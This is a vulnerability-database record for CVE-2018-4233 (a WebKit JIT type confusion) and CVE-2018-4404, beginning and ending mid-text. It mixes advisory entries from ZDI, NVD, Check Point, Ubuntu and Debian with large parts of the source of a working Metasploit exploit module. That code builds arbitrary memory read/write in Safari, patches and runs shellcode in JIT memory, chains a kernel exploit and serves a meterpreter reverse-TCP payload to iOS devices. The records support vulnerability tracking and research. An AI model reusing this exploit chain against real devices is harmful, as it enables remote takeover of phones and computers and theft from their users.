= header;\r\n\r\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\r\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\r\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\r\n driver[2] = referenceFloat64ArrayRawAddr;\r\n var header = float64MemView[0];\r\n var length = float64MemView[3];\r\n var mode = float64MemView[4];\r\n driver[2] = containerRawAddr;\r\n float64MemView[2] = header;\r\n float64MemView[3] = 0;\r\n float64MemView[5] = length;\r\n float64MemView[6] = mode;\r\n\r\n // Root the container object so it isn't garbage collected.\r\n // This will allocate a butterfly for the fake object and store a reference to the container there.\r\n // The fake array itself is rooted by the memory object (closures).\r\n driver.container = container;\r\n\r\n ///\r\n /// END CRITICAL SECTION\r\n ///\r\n /// Objects are repaired, we will now survive a GC\r\n ///\r\n if (typeof(gc) !== 'undefined')\r\n gc();\r\n\r\n memory = {\r\n read: function(addr, length) {\r\n driver[2] = memory.addrof(uint8MemView).asDouble();\r\n float64MemView[2] = addr.asDouble();\r\n var a = new Array(length);\r\n for (var i = 0; i < length; i++)\r\n a[i] = uint8MemView[i];\r\n return a;\r\n },\r\n\r\n write: function(addr, data) {\r\n driver[2] = memory.addrof(uint8MemView).asDouble();\r\n float64MemView[2] = addr.asDouble();\r\n for (var i = 0; i < data.length; i++)\r\n uint8MemView[i] = data[i];\r\n },\r\n\r\n read8: function(addr) {\r\n driver[2] = addr.asDouble();\r\n return Int64.fromDouble(float64MemView[0]);\r\n },\r\n\r\n write8: function(addr, value) {\r\n driver[2] = addr.asDouble();\r\n float64MemView[0] = value.asDouble();\r\n },\r\n\r\n addrof: function(obj) {\r\n float64MemView.leakme = obj;\r\n var butterfly = Int64.fromDouble(driver[1]);\r\n return memory.read8(Sub(butterfly, 0x10));\r\n },\r\n };\r\n\r\n print(\"[+] Got stable memory read/write!\");\r\n\r\n // Find binary base\r\n var funcAddr = memory.addrof(Math.sin);\r\n var executableAddr = memory.read8(Add(funcAddr, 24));\r\n var codeAddr = memory.read8(Add(executableAddr, 24));\r\n var vtabAddr = memory.read8(codeAddr);\r\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\r\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\r\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\r\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\r\n\r\n var dyldStubLoaderAddr = memory.read8(jscBase);\r\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\r\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\r\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\r\n print(\"[*] dyld.dylib @ \" + dyldBase);\r\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\r\n\r\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\r\n print(\"[*] confstr @ \" + confstrAddr);\r\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\r\n print(\"[*] dlopen @ \" + dlopenAddr);\r\n\r\n // Patching shellcode\r\n var stage2Addr = memory.addrof(stage2);\r\n stage2Addr = memory.read8(Add(stage2Addr, 16));\r\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\r\n\r\n stage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr);\r\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\r\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\r\n stage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr);\r\n print(\"[+] Shellcode patched\");\r\n\r\n // Leak JITCode pointer poison value\r\n var poison_addr = Add(jscBase, 305152);\r\n print(\"[*] Poison value @ \" + poison_addr);\r\n var poison = memory.read8(poison_addr);\r\n print(\"[*] Poison value: \" + poison);\r\n\r\n // Shellcode\r\n var func = makeJITCompiledFunction();\r\n var funcAddr = memory.addrof(func);\r\n print(\"[+] Shellcode function object @ \" + funcAddr);\r\n var executableAddr = memory.read8(Add(funcAddr, 24));\r\n print(\"[+] Executable instance @ \" + executableAddr);\r\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\r\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\r\n\r\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\r\n var codeAddr = Xor(codeAddrPoisoned, poison);\r\n print(\"[+] RWX memory @ \" + codeAddr.toString());\r\n print(\"[+] Writing shellcode...\");\r\n var origCode = memory.read(codeAddr, stage1.length);\r\n memory.write(codeAddr, stage1);\r\n\r\n print(\"[!] Jumping into shellcode...\");\r\n var res = func();\r\n if (res === 0) {\r\n print(\"[+] Shellcode executed sucessfully!\");\r\n } else {\r\n print(\"[-] Shellcode failed to execute: error \" + res);\r\n }\r\n\r\n memory.write(codeAddr, origCode);\r\n print(\"[*] Restored previous JIT code\");\r\n\r\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\r\n if (typeof(gc) !== 'undefined')\r\n gc();\r\n}\r\n\r\nready.then(function() {\r\n try {\r\n pwn();\r\n } catch (e) {\r\n print(\"[-] Exception caught: \" + e);\r\n }\r\n}).catch(function(err) {\r\n print(\"[-] Initializatin failed\");\r\n});\r\n\r\n</script>\r\n</body>\r\n</html>\r\n ^\r\n unless datastore['DEBUG_EXPLOIT']\r\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\r\n end\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/download/45998", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-01-31T21:41:53", "description": "This vulnerability allows local attackers to escalate privileges on vulnerable installations of Apple macOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of Mach messages to the Dock. The issue results from the lack of proper validation of the client prior to spawning a process. An attacker can leverage this vulnerability to execute code within the context of the current user.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "zdi", "title": "(Pwn2Own) Apple macOS launchd Improper Access Check Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4404"], "modified": "2018-11-05T00:00:00", "id": "ZDI-18-1338", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-1338/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:42:07", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of JIT. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-30T00:00:00", "type": "zdi", "title": "(Pwn2Own) Apple Safari CreateThis Type Confusion Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233"], "modified": "2018-10-30T00:00:00", "id": "ZDI-18-1321", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-1321/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T17:36:03", "description": "In iOS before 11.4 and macOS High Sierra before 10.13.5, a memory corruption issue exists and was addressed with improved memory handling.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-01-11T18:29:00", "type": "cve", "title": "CVE-2018-4404", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4404"], "modified": "2019-01-23T19:01:00", "cpe": [], "id": "CVE-2018-4404", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4404", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T17:32:41", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", "type": "cve", "title": "CVE-2018-4233", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233"], "modified": "2019-06-02T17:29:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:18.04"], "id": "CVE-2018-4233", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4233", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:24:43", "description": "A remote code execution vulnerability exists in Apple WebKit. The vulnerability is due to a memory corruption when handling of objects in javascript JIT. A remote attacker could exploit the vulnerability by enticing the target user to open a specially crafted js webpage. Successful exploitation could cause memory corruption in a way that would allow attackers to execute code on the target system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-31T00:00:00", "type": "checkpoint_advisories", "title": "Apple WebKit Memory Corruption (CVE-2018-4233)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233"], "modified": "2019-06-12T00:00:00", "id": "CPAI-2019-0017", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-01-22T11:51:35", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is\naffected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is\naffected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is\naffected. watchOS before 4.3.1 is affected. The issue involves the \"WebKit\"\ncomponent. It allows remote attackers to execute arbitrary code or cause a\ndenial of service (memory corruption and application crash) via a crafted\nweb site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-08T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4233", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233"], "modified": "2018-06-08T00:00:00", "id": "UB:CVE-2018-4233", "href": "https://ubuntu.com/security/CVE-2018-4233", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-05-24T03:41:56", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", "type": "debiancve", "title": "CVE-2018-4233", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233"], "modified": "2018-06-08T18:29:00", "id": "DEBIANCVE:CVE-2018-4233", "href": "https://security-tracker.debian.org/tracker/CVE-2018-4233", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-26T09:26:20", "description": "This Metasploit module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution. The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-03T00:00:00", "type": "zdt", "title": "Safari Webkit Proxy Object Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233", "CVE-2017-13861"], "modified": "2019-06-03T00:00:00", "id": "1337DAY-ID-32828", "href": "https://0day.today/exploit/description/32828", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Webkit Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The type confusion leads to the ability to allocate fake Javascript objects,\n as well as the ability to find the address in memory of a Javascript object.\n This allows us to construct a fake JSCell object that can be used to read\n and write arbitrary memory from Javascript. The module then uses a ROP chain\n to write the first stage shellcode into executable memory within the Safari\n process and kick off its execution.\n\n The first stage maps the second stage macho (containing CVE-2017-13861) into\n executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake\n exploit leads to a kernel task port (TFP0) that can read and write arbitrary\n kernel memory. The processes credential and sandbox structure in the kernel\n is overwritten and the meterpreter payloads code signature hash is added to\n the kernels trust cache, allowing Safari to load and execute the (self-signed)\n meterpreter payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo',\n 'niklasb',\n 'Ian Beer',\n 'siguza',\n ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2017-13861'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],\n ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],\n ],\n 'Arch' => ARCH_AARCH64,\n 'Platform' => 'apple_ios',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => 'Mar 15 2018'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n OptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]),\n ])\n end\n\n def exploit_data(directory, file)\n path = ::File.join Msf::Config.data_directory, 'exploits', directory, file\n ::File.binread path\n end\n\n def payload_url\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\n end\n\n def get_version(user_agent)\n if user_agent =~ /OS (.*?) like Mac OS X\\)/\n ios_version = Gem::Version.new($1.gsub(\"_\", \".\"))\n return ios_version\n end\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n def on_request_uri(cli, request)\n if request.uri =~ %r{/apple-touch-icon*}\n return\n elsif request.uri =~ %r{/favicon*}\n return\n elsif request.uri =~ %r{/payload10$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha1 iOS 10 payload\")\n return\n elsif request.uri =~ %r{/payload11$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha256 iOS 11 payload\")\n return\n end\n\n user_agent = request['User-Agent']\n print_status(\"Requesting #{request.uri} from #{user_agent}\")\n version = get_version(user_agent)\n ios_11 = (version >= Gem::Version.new('11.0.0'))\n if request.uri =~ %r{/exploit$}\n loader_data = exploit_data('CVE-2017-13861', 'exploit')\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\n payload_url_index = loader_data.index('PAYLOAD_URL')\n loader_data[payload_url_index, config.length] = config\n print_good(\"Sent async_wake exploit\")\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n return\n end\n\n get_mem_rw_ios_10 = %Q^\nfunction get_mem_rw(stage1) {\n var structs = [];\n function sprayStructures() {\n function randomString() {\n return Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5)\n }\n for (var i = 0; i < 4096; i++) {\n var a = new Float64Array(1);\n a[randomString()] = 1337;\n structs.push(a)\n }\n }\n sprayStructures();\n var hax = new Uint8Array(4096);\n var jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]);\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: false,\n vector: hax,\n lengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue()\n };\n var address = Add(stage1.addrof(container), 16);\n var fakearray = stage1.fakeobj(address);\n while (!(fakearray instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue()\n }\n memory = {\n read: function(addr, length) {\n fakearray[2] = i2f(addr);\n var a = new Array(length);\n for (var i = 0; i < length; i++) a[i] = hax[i];\n return a\n },\n readInt64: function(addr) {\n return new Int64(this.read(addr, 8))\n },\n write: function(addr, data) {\n fakearray[2] = i2f(addr);\n for (var i = 0; i < data.length; i++) hax[i] = data[i]\n },\n writeInt64: function(addr, val) {\n return this.write(addr, val.bytes())\n },\n };\n var empty = {};\n var header = memory.read(stage1.addrof(empty), 8);\n memory.write(stage1.addrof(container), header);\n var f64array = new Float64Array(8);\n header = memory.read(stage1.addrof(f64array), 16);\n memory.write(stage1.addrof(fakearray), header);\n memory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]);\n fakearray.container = container;\n return memory;\n}\n^\n\n get_mem_rw_ios_11 = %Q^\nfunction get_mem_rw(stage1) {\n var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 0x18 : 0x10;\n var structure_spray = []\n for (var i = 0; i < 1000; ++i) {\n var ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff}\n ary['prop'+i] = 1\n structure_spray.push(ary)\n }\n var manager = structure_spray[500]\n var leak_addr = stage1.addrof(manager)\n //print('leaking from: '+ hex(leak_addr))\n function alloc_above_manager(expr) {\n var res\n do {\n for (var i = 0; i < ALLOCS; ++i) {\n structure_spray.push(eval(expr))\n }\n res = eval(expr)\n } while (stage1.addrof(res) < leak_addr)\n return res\n }\n var unboxed_size = 100\n var unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']')\n var boxed = alloc_above_manager('[{}]')\n var victim = alloc_above_manager('[]')\n // Will be stored out-of-line at butterfly - 0x10\n victim.p0 = 0x1337\n function victim_write(val) {\n victim.p0 = val\n }\n function victim_read() {\n return victim.p0\n }\n i32[0] = 0x200 // Structure ID\n i32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing\n var outer = {\n p0: 0, // Padding, so that the rest of inline properties are 16-byte aligned\n p1: f64[0],\n p2: manager,\n p3: 0xfffffff, // Butterfly indexing mask\n }\n var fake_addr = stage1.addrof(outer) + FPO + 0x8;\n //print('fake obj @ ' + hex(fake_addr))\n var unboxed_addr = stage1.addrof(unboxed)\n var boxed_addr = stage1.addrof(boxed)\n var victim_addr = stage1.addrof(victim)\n //print('leak ' + hex(leak_addr)\n //+ ' unboxed ' + hex(unboxed_addr)\n //+ ' boxed ' + hex(boxed_addr)\n //+ ' victim ' + hex(victim_addr))\n var holder = {fake: {}}\n holder.fake = stage1.fakeobj(fake_addr)\n // From here on GC would be uncool\n // Share a butterfly for easier boxing/unboxing\n var shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8])\n var boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8]\n holder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly)\n var victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8]\n function set_victim_addr(where) {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10)\n }\n function reset_victim_addr() {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly\n }\n var stage2 = {\n addrof: function(victim) {\n boxed[0] = victim\n return f2i(unboxed[0])\n },\n fakeobj: function(addr) {\n unboxed[0] = i2f(addr)\n return boxed[0]\n },\n write64: function(where, what) {\n set_victim_addr(where)\n victim_write(this.fakeobj(what))\n reset_victim_addr()\n },\n read64: function(where) {\n set_victim_addr(where)\n var res = this.addrof(victim_read())\n reset_victim_addr()\n return res;\n },\n write_non_zero: function(where, values) {\n for (var i = 0; i < values.length; ++i) {\n if (values[i] != 0)\n this.write64(where + i*8, values[i])\n }\n },\n readInt64: function(where) {\n if (where instanceof Int64) {\n where = Add(where, 0x10);\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble();\n } else {\n set_victim_addr(where);\n }\n boxed[0] = 